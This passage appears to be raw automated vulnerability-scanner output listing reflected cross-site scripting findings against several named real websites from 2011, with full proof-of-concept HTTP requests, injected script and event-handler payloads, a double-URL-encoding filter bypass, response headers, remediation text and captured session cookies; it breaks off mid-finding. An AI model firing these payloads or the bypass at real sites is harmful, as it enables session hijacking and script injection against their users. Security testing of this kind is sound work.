GET /red/psi/sites/www.klivio.com/p.json?callback=_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.klivio.com%2F%3F34aa6%2522%253E%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Eceac919ade3%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F69&fb5wa3 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 16:16:53 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 16:16:53 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 06 Feb 2011 16:16:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 16:16:53 GMT Connection: close
The value of the bg1 request parameter is copied into the HTML document as plain text between tags. The payload 6b18f<script>alert(1)</script>3e30c6ee661 was submitted in the bg1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF6b18f<script>alert(1)</script>3e30c6ee661&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the bg2 request parameter is copied into the HTML document as plain text between tags. The payload fa455<script>alert(1)</script>a267106d572 was submitted in the bg2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECECfa455<script>alert(1)</script>a267106d572&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the border request parameter is copied into the HTML document as plain text between tags. The payload b277e<script>alert(1)</script>0c9da3d43ac was submitted in the border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEBb277e<script>alert(1)</script>0c9da3d43ac HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the header_bg request parameter is copied into the HTML document as plain text between tags. The payload cf11a<script>alert(1)</script>b223fafe30f was submitted in the header_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893cf11a<script>alert(1)</script>b223fafe30f&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the header_text_color request parameter is copied into the HTML document as plain text between tags. The payload b0d61<script>alert(1)</script>541aa12ac86 was submitted in the header_text_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffffb0d61<script>alert(1)</script>541aa12ac86&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.52. http://ecal.forexpros.com/e_cal.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ecal.forexpros.com
Path:
/e_cal.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f1513<script>alert(1)</script>4215d583f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CE/f1513<script>alert(1)</script>4215d583f88DBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the top_bg request parameter is copied into the HTML document as plain text between tags. The payload 48257<script>alert(1)</script>6e0a41b399b was submitted in the top_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C48257<script>alert(1)</script>6e0a41b399b&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the top_text_color request parameter is copied into the HTML document as plain text between tags. The payload 9fd66<script>alert(1)</script>2df195dea04 was submitted in the top_text_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF9fd66<script>alert(1)</script>2df195dea04&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 433e1"><img%20src%3da%20onerror%3dalert(1)>bbd0b8b028e was submitted in the REST URL parameter 1. This input was echoed as 433e1"><img src=a onerror=alert(1)>bbd0b8b028e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tools433e1"><img%20src%3da%20onerror%3dalert(1)>bbd0b8b028e/overlay.html HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="tools433e1"><img src=a onerror=alert(1)>bbd0b8b028e_overlay" class="msie tools"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47888%2527%253balert%25281%2529%252f%252f8fcf167d281 was submitted in the REST URL parameter 5. This input was echoed as 47888';alert(1)//8fcf167d281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%2527%253balert%25281%2529%252f%252f8fcf167d281/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:01 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... 1',false,{ titleHTML:'', sCustomFPWScope:'' });
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a19b%2527%253balert%25281%2529%252f%252f35f276845e was submitted in the REST URL parameter 7. This input was echoed as 1a19b';alert(1)//35f276845e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:33 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... ert(1)//35f276845e', 'Ariens',false,{ titleHTML:'', sCustomFPWScope:'' });
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50f52%2527%253balert%25281%2529%252f%252f293c700832d was submitted in the REST URL parameter 5. This input was echoed as 50f52';alert(1)//293c700832d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens50f52%2527%253balert%25281%2529%252f%252f293c700832d/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c4ee%2527%253balert%25281%2529%252f%252f94f30994ebc was submitted in the REST URL parameter 7. This input was echoed as 2c4ee';alert(1)//94f30994ebc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e2c4ee%2527%253balert%25281%2529%252f%252f94f30994ebc/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60be1%2527%253balert%25281%2529%252f%252f5596dc43a2 was submitted in the REST URL parameter 7. This input was echoed as 60be1';alert(1)//5596dc43a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/60be1%2527%253balert%25281%2529%252f%252f5596dc43a2/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 990de%2527%253balert%25281%2529%252f%252fa6bd97b8f6e was submitted in the REST URL parameter 5. This input was echoed as 990de';alert(1)//a6bd97b8f6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281990de%2527%253balert%25281%2529%252f%252fa6bd97b8f6e/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83c99%2527%253balert%25281%2529%252f%252f366fb95dad1 was submitted in the REST URL parameter 7. This input was echoed as 83c99';alert(1)//366fb95dad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type83c99%2527%253balert%25281%2529%252f%252f366fb95dad1/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97252%2527%253balert%25281%2529%252f%252f65b1cc71132 was submitted in the REST URL parameter 5. This input was echoed as 97252';alert(1)//65b1cc71132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/97252%2527%253balert%25281%2529%252f%252f65b1cc71132/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a620c"%3balert(1)//7fca9867605 was submitted in the mpck parameter. This input was echoed as a620c";alert(1)//7fca9867605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5Da620c"%3balert(1)//7fca9867605&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:17 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 6164 Content-Type: application/x-javascript
The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f94"%3balert(1)//6b802c89842 was submitted in the mpjs parameter. This input was echoed as 75f94";alert(1)//6b802c89842 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B75f94"%3balert(1)//6b802c89842&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:23 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 5804 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ebf"%3balert(1)//9d047a6ebcf was submitted in the mpvc parameter. This input was echoed as 47ebf";alert(1)//9d047a6ebcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
